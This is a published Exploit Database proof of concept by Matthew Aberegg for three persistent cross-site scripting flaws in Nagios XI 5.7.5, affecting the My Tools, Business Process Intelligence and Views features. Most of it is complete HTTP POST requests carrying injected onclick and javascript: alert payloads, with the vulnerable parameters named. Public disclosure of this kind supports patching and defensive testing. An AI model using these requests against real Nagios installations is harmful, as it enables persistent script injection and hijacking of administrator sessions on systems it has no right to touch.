Nagios XI 5.7.5 – Multiple Persistent Cross-Site Scripting

• Exploit Database
• 18 阅读

• 作者： Matthew Aberegg
  日期： 2021-01-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49449/

• # Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
  # Date: 1-20-2021
  # Exploit Author: Matthew Aberegg
  # Vendor Homepage: https://www.nagios.com/products/nagios-xi/
  # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
  # Software Link: https://www.nagios.com/downloads/nagios-xi/
  # Version: Nagios XI 5.7.5
  # Tested on: Ubuntu 18.04
  
  
  # Vulnerability Details
  # Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.
  # Vulnerable Parameter : url
  
  
  # POC
  # Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.
  
  POST /nagiosxi/tools/mytools.php HTTP/1.1
  Host: TARGET
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 145
  Origin: http://TARGET
  Connection: close
  Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1
  Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas
  Upgrade-Insecure-Requests: 1
  
  nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton=
  
  
  ############################################################################################################
  
  # Vulnerability Details
  # Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI.
  # Vulnerable Parameter : groupID
  
  
  # POC
  # Exploit Details : The following request will create a BPI group with an XSS payload.Click on the Group ID for the malicious BPI group to trigger the payload.
  
  POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1
  Host: TARGET
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 186
  Origin: http://TARGET
  Connection: close
  Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add
  Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
  Upgrade-Insecure-Requests: 1
  
  groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true
  
  
  ############################################################################################################
  
  # Vulnerability Details
  # Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI.
  # Vulnerable Parameter : url
  
  
  # POC
  # Exploit Details : The following request will create a view with an XSS payload.Click on the malicious view to trigger the payload.
  
  POST /nagiosxi/ajaxhelper.php HTTP/1.1
  Host: TARGET
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Content-Length: 147
  Origin: http://TARGET
  Connection: close
  Referer: http://TARGET/nagiosxi/account/
  Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
  
  cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056